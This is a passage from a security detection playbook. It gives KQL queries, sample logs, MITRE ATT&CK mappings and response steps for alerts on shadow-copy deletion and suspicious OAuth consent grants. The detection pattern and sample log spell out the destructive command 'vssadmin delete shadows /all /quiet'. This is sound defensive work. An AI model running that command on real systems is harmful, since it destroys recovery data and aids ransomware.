Alternate (Script-Based Anti-Recovery Detection):
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "vssadmin delete shadows /all /quiet"
MITRE ATT&CK Mapping
Tactic Impact
Technique T1490 – Inhibit System Recovery
Explanation:
Deleting VSS copies is a destructive tactic to prevent rollback or restoration of encrypted
files, particularly seen during or right before ransomware deployment.
EDR Log (VSS Deletion Attempt)
{
"TimeGenerated": "2025-04-23T09:50:12Z",
"DeviceName": "FINANCE-SERVER01",
"UserName": "unknown_user",
"FileName": "vssadmin.exe",
"ProcessCommandLine": "vssadmin delete shadows /all /quiet",
"ParentProcess": "ransomware_loader.exe"
}
Threat Behavior Indicators
• Use of vssadmin.exe or wmic to delete shadow copies silently
• Deletion initiated by unknown or non-admin user
• Occurs before or alongside file encryption or mass modification
• Parent process is suspicious or unrecognised binary
Response Actions
1. Immediately isolate the host to prevent further damage
2. Review all processes associated with vssadmin, wmic or powershell
3. Check for signs of ransomware activity (ransom note files, encrypted extensions)
4. Ensure regular backups are stored off-network or on immutable storage
5. Implement endpoint rules to block shadow copy deletions by default
6. Enable alerting for usage of sensitive admin tools in production systems
50. Alert Name: Unusual OAuth Consent Grant to External Application (Cloud App
Abuse)
Alert Logic
Objective: Detect when a user consents to an OAuth application that is either unverified,
unusual or external to the organisation, which may indicate phishing-based consent grant
attacks or illicit app registrations.
Data Sources:
• Microsoft 365 Audit Logs (Unified Audit Log, Azure AD logs)
• Google Workspace admin logs
• Identity providers (example, Okta, Ping, OneLogin)
• Cloud App Security / CASB
Detection Logic (KQL – M365 OAuth Consent):
let ApprovedAppList = dynamic(["<approved-app-id>"]);   // placeholder: your allowlisted application IDs
AuditLogs
| where OperationName == "Consent to application"
| where ApplicationId !in (ApprovedAppList)
| where UserId !startswith "svc" and UserId !contains "admin"
| extend Alert = "Unusual OAuth application consent granted"
In the native Entra AuditLogs table the consenting user is recorded under InitiatedBy and the application under TargetResources; extend those into UserId and ApplicationId before applying the filters above.
Alternate (Risk-Based Filtering):
• Trigger alert if application:
o Is not verified or published
o Requests risky permissions (example, Mail.ReadWrite, Files.Read.All,
User.ReadWrite.All)
o Was granted consent by non-admin users
MITRE ATT&CK Mapping
Tactic Initial Access, Persistence
Techniques T1528 – Steal Application Access Token
T1550.001 – Use Alternate Authentication Material: Application Access Token
Explanation:
In consent phishing, attackers trick users into approving rogue apps that grant long-term
access to email, files and calendar data, access that survives password resets or MFA changes.
OAuth Consent Audit Log
{
"TimeGenerated": "2025-04-23T10:05:33Z",
"UserId": "fatimah.saleh@company.com",
"AppDisplayName": "SecureDocs Sync Manager",
"ApplicationId": "a78d6aaf-0099-4f45-910a-ae5d01e79c2d",
"PermissionsGranted": ["Files.Read.All", "Mail.Send"],
"ConsentType": "User",
"Publisher": "external-unverified",
"ClientIP": "192.0.2.119"
}
Threat Behavior Indicators
• Consent given to unknown, unverified or newly registered apps
• App requests sensitive or wide-scope permissions (example, full mailbox, file
access)
• App is granted consent without admin review or from high-risk user
• App was never used previously and doesn't match company policy or tooling
Response Actions
1. Revoke consent immediately using Azure AD / Google Admin Console
2. Investigate the user who granted access; verify whether phishing or social engineering was involved
3. Review app permissions and investigate if data was accessed or exfiltrated
4. Block the app tenant-wide using conditional access or app blocking policies
5. Enable publisher verification requirement and admin consent workflow
6. Train users to report unexpected consent screens or prompts